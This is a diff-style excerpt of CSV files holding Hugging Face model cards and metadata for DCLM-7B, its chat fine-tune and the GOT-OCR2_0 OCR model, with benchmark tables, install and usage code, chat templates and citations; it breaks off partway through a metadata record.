| 121 |
+
| BigBench Operators | 0.4857 |
|
| 122 |
+
| BigBench Repeat Copy Logic | 0.4063 |
|
| 123 |
+
| Simple Arithmetic (no spaces) | 0.2940 |
|
| 124 |
+
| Simple Arithmetic (with spaces) | 0.3110 |
|
| 125 |
+
| MathQA | 0.3098 |
|
| 126 |
+
| LogiQA | 0.4132 |
|
| 127 |
+
| PubMedQA | 0.7060 |
|
| 128 |
+
| SQuAD | 0.5856 |
|
| 129 |
+
| AGI Eval LSAT RC | 0.6716 |
|
| 130 |
+
| AGI Eval LSAT LR | 0.5392 |
|
| 131 |
+
| CoQA | 0.4074 |
|
| 132 |
+
| BigBench Understanding Fables | 0.6825 |
|
| 133 |
+
| BoolQ | 0.8343 |
|
| 134 |
+
| AGI Eval SAT EN | 0.7670 |
|
| 135 |
+
| Winogender MC (Female) | 0.6000 |
|
| 136 |
+
| Winogender MC (Male) | 0.5500 |
|
| 137 |
+
| Enterprise PII Classification | 0.7676 |
|
| 138 |
+
| BBQ | 0.6912 |
|
| 139 |
+
| GPQA Main | 0.2612 |
|
| 140 |
+
| GPQA Diamond | 0.2475 |
|
| 141 |
+
|
| 142 |
+
Note: All scores are presented as decimal values between 0 and 1, representing the proportion of correct answers or the model's performance on each task.
|
| 143 |
+
|
| 144 |
+
|
| 145 |
+
## Comparison
|
| 146 |
+
|
| 147 |
+
|
| 148 |
+
Below are comparisions of this model with other models in the 7B regime.
|
| 149 |
+
|
| 150 |
+
| Model | Params | Tokens | Open dataset? | CORE | MMLU | EXTENDED |
|
| 151 |
+
|---------------|--------|--------|---------------|----------|----------|----------|
|
| 152 |
+
| **Open weights, closed datasets** | | | | | | |
|
| 153 |
+
| Llama2 | 7B | 2T | ❌ | 49.2 | 45.8 | 34.1 |
|
| 154 |
+
| DeepSeek | 7B | 2T | ❌ | 50.7 | 48.5 | 35.3 |
|
| 155 |
+
| Mistral-0.3 | 7B | ? | ❌ | 57.0 | 62.7 | 45.1 |
|
| 156 |
+
| QWEN-2 | 7B | ? | ❌ | 57.5 | **71.9** | 50.5 |
|
| 157 |
+
| Llama3 | 8B | 15T | ❌ | 57.6 | 66.2 | 46.3 |
|
| 158 |
+
| Gemma | 8B | 6T | ❌ | 57.8 | 64.3 | 44.6 |
|
| 159 |
+
| Phi-3 | 7B | ? | ❌ | **61.0** | 69.9 | **57.9** |
|
| 160 |
+
| **Open weights, open datasets** | | | | | | |
|
| 161 |
+
| Falcon | 7B | 1T | ✅ | 44.1 | 27.4 | 25.1 |
|
| 162 |
+
| OLMo-1.7 | 7B | 2.1T | ✅ | 47.0 | 54.0 | 34.2 |
|
| 163 |
+
| MAP-Neo | 7B | 4.5T | ✅ | **50.2** | **57.1** | **40.4** |
|
| 164 |
+
| **DCLM-7B** | 7B | 2.5T | ✅ | **56.1** | **63.7** | **43.6** |
|
| 165 |
+
|
| 166 |
+
|
| 167 |
+
|
| 168 |
+
## Limitations and Biases
|
| 169 |
+
|
| 170 |
+
While DCLM-Baseline-7B demonstrates strong performance across a range of tasks, it's important to note:
|
| 171 |
+
|
| 172 |
+
1. The model may exhibit biases present in its training data, which is derived from web crawl data.
|
| 173 |
+
2. It has not undergone specific alignment or safety fine-tuning, so outputs should be used with caution.
|
| 174 |
+
3. Performance on tasks not included in the evaluation suite may vary.
|
| 175 |
+
4. The model's knowledge is limited to its training data cutoff date.
|
| 176 |
+
|
| 177 |
+
## Ethical Considerations
|
| 178 |
+
|
| 179 |
+
Users should be aware that this model, like all large language models, can potentially generate harmful or biased content. It should not be used for making decisions about individuals or in sensitive applications without appropriate safeguards and human oversight.
|
| 180 |
+
|
| 181 |
+
## Citation
|
| 182 |
+
|
| 183 |
+
If you use this model in your research, please cite:
|
| 184 |
+
|
| 185 |
+
```
|
| 186 |
+
@article{Li2024DataCompLM,
|
| 187 |
+
title={DataComp-LM: In search of the next generation of training sets for language models},
|
| 188 |
+
author={Jeffrey Li and Alex Fang and Georgios Smyrnis and Maor Ivgi and Matt Jordan and Samir Gadre and Hritik Bansal and Etash Guha and Sedrick Keh and Kushal Arora and [... full author list]},
|
| 189 |
+
journal={arXiv preprint arXiv:2406.11794},
|
| 190 |
+
year={2024}
|
| 191 |
+
}
|
| 192 |
+
```
|
| 193 |
+
","{""id"": ""apple/DCLM-7B"", ""author"": ""apple"", ""sha"": ""c85bfa168f999ce27e954808bc005a2748fda5c5"", ""last_modified"": ""2024-07-26 03:40:38+00:00"", ""created_at"": ""2024-07-11 17:44:35+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 599, ""downloads_all_time"": null, ""likes"": 833, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""openlm"", ""arxiv:2406.11794"", ""license:apple-ascl"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: apple-ascl"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""OpenLMModel""], ""model_type"": ""openlm"", ""tokenizer_config"": {""unk_token"": ""<|endoftext|>"", ""bos_token"": ""<|endoftext|>"", ""eos_token"": ""<|endoftext|>""}}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""jmercat/DCLM-demo"", ""Ireneo/apple_dclm"", ""ZMaxAIru/apple_dclm""], ""safetensors"": {""parameters"": {""F32"": 6889674752}, ""total"": 6889674752}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-07-26 03:40:38+00:00"", ""cardData"": ""license: apple-ascl"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": null, ""pipeline_tag"": null, ""processor"": null}, ""_id"": ""66901a03c961f5d23fe157b4"", ""modelId"": ""apple/DCLM-7B"", ""usedStorage"": 27558732152}",0,https://huggingface.co/mathewhe/DCLM-7B-Chat,1,,0,,0,,0,"Ireneo/apple_dclm, ZMaxAIru/apple_dclm, huggingface/InferenceSupport/discussions/new?title=apple/DCLM-7B&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bapple%2FDCLM-7B%5D(%2Fapple%2FDCLM-7B)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, jmercat/DCLM-demo",4
|
| 194 |
+
mathewhe/DCLM-7B-Chat,"---
|
| 195 |
+
base_model: apple/DCLM-7B
|
| 196 |
+
datasets:
|
| 197 |
+
- HuggingFaceH4/ultrachat_200k
|
| 198 |
+
- teknium/OpenHermes-2.5
|
| 199 |
+
- princeton-nlp/gemma2-ultrafeedback-armorm
|
| 200 |
+
license: apache-2.0
|
| 201 |
+
tags:
|
| 202 |
+
- text
|
| 203 |
+
---
|
| 204 |
+
|
| 205 |
+
# DCLM-7B-Chat
|
| 206 |
+
|
| 207 |
+
This is a fine-tuned version of the DCLM-7B baseline model trained for chat
|
| 208 |
+
completions.
|
| 209 |
+
|
| 210 |
+
## Quick start
|
| 211 |
+
|
| 212 |
+
To use the model, `open_lm` must first be installed:
|
| 213 |
+
```shell
|
| 214 |
+
pip install git+https://github.com/mlfoundations/open_lm.git
|
| 215 |
+
```
|
| 216 |
+
|
| 217 |
+
Then simply load the model and generate responses:
|
| 218 |
+
```python
|
| 219 |
+
from open_lm.hf import *
|
| 220 |
+
from transformers import (
|
| 221 |
+
AutoModelForCausalLM,
|
| 222 |
+
AutoTokenizer,
|
| 223 |
+
)
|
| 224 |
+
|
| 225 |
+
|
| 226 |
+
model = AutoModelForCausalLM.from_pretrained(""mathewhe/DCLM-7B-Chat"")
|
| 227 |
+
tokenizer = AutoTokenizer.from_pretrained(""mathewhe/DCLM-7B-Chat"")
|
| 228 |
+
|
| 229 |
+
messages = [
|
| 230 |
+
{""role"": ""user"", ""content"": ""What is an LLM?""},
|
| 231 |
+
]
|
| 232 |
+
|
| 233 |
+
inputs = tokenizer.apply_chat_template(messages)
|
| 234 |
+
|
| 235 |
+
print(tokenizer.decode(model.generate(**inputs)[0]))
|
| 236 |
+
```
|
| 237 |
+
|
| 238 |
+
Alternatively, copy the included `chat_class.py` module into your local
|
| 239 |
+
directory and just import the `Chat` class:
|
| 240 |
+
```
|
| 241 |
+
from chat_class import Chat
|
| 242 |
+
chat = Chat() # default args: Chat(""mathewhe/DCLM-7B-Chat"", device=""cuda"")
|
| 243 |
+
|
| 244 |
+
# for one-off instructions
|
| 245 |
+
instruction = ""Write a list of ingredients for banana pudding.""
|
| 246 |
+
print(chat.instruct(instruction))
|
| 247 |
+
|
| 248 |
+
# for multi-turn chat
|
| 249 |
+
response1 = chat.message(""Who was Stan Lee?"")
|
| 250 |
+
response2 = chat.message(""What was his wife's name?"")
|
| 251 |
+
|
| 252 |
+
# to reset the chat
|
| 253 |
+
chat.reset()
|
| 254 |
+
```
|
| 255 |
+
|
| 256 |
+
## Chat template
|
| 257 |
+
|
| 258 |
+
This model uses the following chat template and does not support a separate
|
| 259 |
+
system prompt:
|
| 260 |
+
```
|
| 261 |
+
<|endoftext|>[INST] <user-message> [/INST][ASST] <llm-response> [/ASST]<|endoftext|>
|
| 262 |
+
```
|
| 263 |
+
|
| 264 |
+
The included tokenizer will correctly format messages, so you should not have
|
| 265 |
+
to manually format the input text.
|
| 266 |
+
|
| 267 |
+
Instead, use the tokenizer's `apply_chat_template()` method on a list of
|
| 268 |
+
messages.
|
| 269 |
+
Each message should be a dict with two keys:
|
| 270 |
+
- ""role"": Either ""user"" or ""assistant"".
|
| 271 |
+
- ""content"": The message to include.
|
| 272 |
+
|
| 273 |
+
For example:
|
| 274 |
+
```python
|
| 275 |
+
from transformers import AutoTokenizer
|
| 276 |
+
|
| 277 |
+
tokenizer = AutoTokenizer.from_pretrained(""mathewhe/DCLM-7B-Chat"")
|
| 278 |
+
|
| 279 |
+
messages = [
|
| 280 |
+
{""role"": ""user"", ""content"": ""Solve for x: 3x=4""},
|
| 281 |
+
{""role"": ""assistant"", ""content"": ""3x=4\n(3x)/3=(4)/3\nx=4/3""},
|
| 282 |
+
{""role"": ""user"", ""content"": ""Please explain your work.""},
|
| 283 |
+
]
|
| 284 |
+
print(tokenizer.apply_chat_template(messages, tokenize=False)
|
| 285 |
+
```
|
| 286 |
+
outputs
|
| 287 |
+
```
|
| 288 |
+
<|endoftext|>[INST] Solve for x: 3x=4 [/INST][ASST] 3x=4
|
| 289 |
+
(3x)/3=(4)/3
|
| 290 |
+
x=4/3 [/ASST]<|endoftext|><|endoftext|>[INST] Please explain your work [/INST]
|
| 291 |
+
```
|
| 292 |
+
|
| 293 |
+
See the example code in the included `chat_class.py` module for more details.
|
| 294 |
+
","{""id"": ""mathewhe/DCLM-7B-Chat"", ""author"": ""mathewhe"", ""sha"": ""57b8619821ccae0ad119f4311df77993c723fa34"", ""last_modified"": ""2024-08-05 13:38:24+00:00"", ""created_at"": ""2024-08-03 14:54:33+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 1, ""downloads_all_time"": null, ""likes"": 2, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""openlm"", ""text"", ""dataset:HuggingFaceH4/ultrachat_200k"", ""dataset:teknium/OpenHermes-2.5"", ""dataset:princeton-nlp/gemma2-ultrafeedback-armorm"", ""base_model:apple/DCLM-7B"", ""base_model:finetune:apple/DCLM-7B"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: apple/DCLM-7B\ndatasets:\n- HuggingFaceH4/ultrachat_200k\n- teknium/OpenHermes-2.5\n- princeton-nlp/gemma2-ultrafeedback-armorm\nlicense: apache-2.0\ntags:\n- text"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""OpenLMForCausalLM""], ""model_type"": ""openlm"", ""tokenizer_config"": {""bos_token"": ""<|endoftext|>"", ""chat_template"": ""\n{%- for message in messages %}\n {%- if message['role'] == 'user' %}\n {{- bos_token + '[INST] ' + message['content'].strip() + ' [/INST]' }}\n {%- elif message['role'] == 'assistant' %}\n {{- '[ASST] ' + message['content'] + ' [/ASST]' + eos_token }}\n {%- endif %}\n{%- endfor %}\n"", ""eos_token"": ""<|endoftext|>"", ""pad_token"": ""[PAD]"", ""unk_token"": ""<|endoftext|>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='chat_class.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00003-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00004-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00005-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00006-of-00006.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='trainer_state.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='training_args.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": {""parameters"": {""F32"": 6889674752}, ""total"": 6889674752}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2024-08-05 13:38:24+00:00"", ""cardData"": ""base_model: apple/DCLM-7B\ndatasets:\n- HuggingFaceH4/ultrachat_200k\n- teknium/OpenHermes-2.5\n- princeton-nlp/gemma2-ultrafeedback-armorm\nlicense: apache-2.0\ntags:\n- text"", ""transformersInfo"": null, ""_id"": ""66ae44a9a20def3de3de2257"", ""modelId"": ""mathewhe/DCLM-7B-Chat"", ""usedStorage"": 27558737584}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=mathewhe/DCLM-7B-Chat&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bmathewhe%2FDCLM-7B-Chat%5D(%2Fmathewhe%2FDCLM-7B-Chat)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
|
GOT-OCR2_0_finetunes_20250424_193500.csv_finetunes_20250424_193500.csv
ADDED
|
@@ -0,0 +1,436 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
stepfun-ai/GOT-OCR2_0,"---
|
| 3 |
+
pipeline_tag: image-text-to-text
|
| 4 |
+
language:
|
| 5 |
+
- multilingual
|
| 6 |
+
tags:
|
| 7 |
+
- got
|
| 8 |
+
- vision-language
|
| 9 |
+
- ocr2.0
|
| 10 |
+
- custom_code
|
| 11 |
+
license: apache-2.0
|
| 12 |
+
---
|
| 13 |
+
|
| 14 |
+
<h1>General OCR Theory: Towards OCR-2.0 via a Unified End-to-end Model
|
| 15 |
+
</h1>
|
| 16 |
+
|
| 17 |
+
[🔋Online Demo](https://huggingface.co/spaces/ucaslcl/GOT_online) | [🌟GitHub](https://github.com/Ucas-HaoranWei/GOT-OCR2.0/) | [📜Paper](https://arxiv.org/abs/2409.01704)</a>
|
| 18 |
+
|
| 19 |
+
|
| 20 |
+
[Haoran Wei*](https://scholar.google.com/citations?user=J4naK0MAAAAJ&hl=en), Chenglong Liu*, Jinyue Chen, Jia Wang, Lingyu Kong, Yanming Xu, [Zheng Ge](https://joker316701882.github.io/), Liang Zhao, [Jianjian Sun](https://scholar.google.com/citations?user=MVZrGkYAAAAJ&hl=en), [Yuang Peng](https://scholar.google.com.hk/citations?user=J0ko04IAAAAJ&hl=zh-CN&oi=ao), Chunrui Han, [Xiangyu Zhang](https://scholar.google.com/citations?user=yuB-cfoAAAAJ&hl=en)
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
|
| 24 |
+

|
| 25 |
+
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
## Usage
|
| 29 |
+
Inference using Huggingface transformers on NVIDIA GPUs. Requirements tested on python 3.10:
|
| 30 |
+
```
|
| 31 |
+
torch==2.0.1
|
| 32 |
+
torchvision==0.15.2
|
| 33 |
+
transformers==4.37.2
|
| 34 |
+
tiktoken==0.6.0
|
| 35 |
+
verovio==4.3.1
|
| 36 |
+
accelerate==0.28.0
|
| 37 |
+
```
|
| 38 |
+
|
| 39 |
+
|
| 40 |
+
```python
|
| 41 |
+
from transformers import AutoModel, AutoTokenizer
|
| 42 |
+
|
| 43 |
+
tokenizer = AutoTokenizer.from_pretrained('ucaslcl/GOT-OCR2_0', trust_remote_code=True)
|
| 44 |
+
model = AutoModel.from_pretrained('ucaslcl/GOT-OCR2_0', trust_remote_code=True, low_cpu_mem_usage=True, device_map='cuda', use_safetensors=True, pad_token_id=tokenizer.eos_token_id)
|
| 45 |
+
model = model.eval().cuda()
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
# input your test image
|
| 49 |
+
image_file = 'xxx.jpg'
|
| 50 |
+
|
| 51 |
+
# plain texts OCR
|
| 52 |
+
res = model.chat(tokenizer, image_file, ocr_type='ocr')
|
| 53 |
+
|
| 54 |
+
# format texts OCR:
|
| 55 |
+
# res = model.chat(tokenizer, image_file, ocr_type='format')
|
| 56 |
+
|
| 57 |
+
# fine-grained OCR:
|
| 58 |
+
# res = model.chat(tokenizer, image_file, ocr_type='ocr', ocr_box='')
|
| 59 |
+
# res = model.chat(tokenizer, image_file, ocr_type='format', ocr_box='')
|
| 60 |
+
# res = model.chat(tokenizer, image_file, ocr_type='ocr', ocr_color='')
|
| 61 |
+
# res = model.chat(tokenizer, image_file, ocr_type='format', ocr_color='')
|
| 62 |
+
|
| 63 |
+
# multi-crop OCR:
|
| 64 |
+
# res = model.chat_crop(tokenizer, image_file, ocr_type='ocr')
|
| 65 |
+
# res = model.chat_crop(tokenizer, image_file, ocr_type='format')
|
| 66 |
+
|
| 67 |
+
# render the formatted OCR results:
|
| 68 |
+
# res = model.chat(tokenizer, image_file, ocr_type='format', render=True, save_render_file = './demo.html')
|
| 69 |
+
|
| 70 |
+
print(res)
|
| 71 |
+
|
| 72 |
+
|
| 73 |
+
```
|
| 74 |
+
More details about 'ocr_type', 'ocr_box', 'ocr_color', and 'render' can be found at our GitHub.
|
| 75 |
+
Our training codes are available at our [GitHub](https://github.com/Ucas-HaoranWei/GOT-OCR2.0/).
|
| 76 |
+
|
| 77 |
+
|
| 78 |
+
|
| 79 |
+
## More Multimodal Projects
|
| 80 |
+
|
| 81 |
+
👏 Welcome to explore more multimodal projects of our team:
|
| 82 |
+
|
| 83 |
+
[Vary](https://github.com/Ucas-HaoranWei/Vary) | [Fox](https://github.com/ucaslcl/Fox) | [OneChart](https://github.com/LingyvKong/OneChart)
|
| 84 |
+
|
| 85 |
+
## Citation
|
| 86 |
+
|
| 87 |
+
If you find our work helpful, please consider citing our papers 📝 and liking this project ❤️!
|
| 88 |
+
|
| 89 |
+
```bib
|
| 90 |
+
@article{wei2024general,
|
| 91 |
+
title={General OCR Theory: Towards OCR-2.0 via a Unified End-to-end Model},
|
| 92 |
+
author={Wei, Haoran and Liu, Chenglong and Chen, Jinyue and Wang, Jia and Kong, Lingyu and Xu, Yanming and Ge, Zheng and Zhao, Liang and Sun, Jianjian and Peng, Yuang and others},
|
| 93 |
+
journal={arXiv preprint arXiv:2409.01704},
|
| 94 |
+
year={2024}
|
| 95 |
+
}
|
| 96 |
+
@article{liu2024focus,
|
| 97 |
+
title={Focus Anywhere for Fine-grained Multi-page Document Understanding},
|
| 98 |
+
author={Liu, Chenglong and Wei, Haoran and Chen, Jinyue and Kong, Lingyu and Ge, Zheng and Zhu, Zining and Zhao, Liang and Sun, Jianjian and Han, Chunrui and Zhang, Xiangyu},
|
| 99 |
+
journal={arXiv preprint arXiv:2405.14295},
|
| 100 |
+
year={2024}
|
| 101 |
+
}
|
| 102 |
+
@article{wei2023vary,
|
| 103 |
+
title={Vary: Scaling up the Vision Vocabulary for Large Vision-Language Models},
|
| 104 |
+
author={Wei, Haoran and Kong, Lingyu and Chen, Jinyue and Zhao, Liang and Ge, Zheng and Yang, Jinrong and Sun, Jianjian and Han, Chunrui and Zhang, Xiangyu},
|
| 105 |
+
journal={arXiv preprint arXiv:2312.06109},
|
| 106 |
+
year={2023}
|
| 107 |
+
}
|
| 108 |
+
```","{""id"": ""stepfun-ai/GOT-OCR2_0"", ""author"": ""stepfun-ai"", ""sha"": ""979938bf89ccdc949c0131ddd3841e24578a4742"", ""last_modified"": ""2025-02-04 00:37:25+00:00"", ""created_at"": ""2024-09-12 16:02:28+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 99298, ""downloads_all_time"": null, ""likes"": 1458, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""GOT"", ""got"", ""vision-language"", ""ocr2.0"", ""custom_code"", ""image-text-to-text"", ""multilingual"", ""arxiv:2409.01704"", ""arxiv:2405.14295"", ""arxiv:2312.06109"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": ""image-text-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""language:\n- multilingual\nlicense: apache-2.0\npipeline_tag: image-text-to-text\ntags:\n- got\n- vision-language\n- ocr2.0\n- custom_code"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""GOTQwenForCausalLM""], ""auto_map"": {""AutoConfig"": ""modeling_GOT.GOTConfig"", ""AutoModel"": ""modeling_GOT.GOTQwenForCausalLM""}, ""model_type"": ""GOT"", ""tokenizer_config"": {""pad_token"": ""<|endoftext|>""}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/got_logo.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/got_support.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/train_sample.jpg', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='got_vision_b.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", 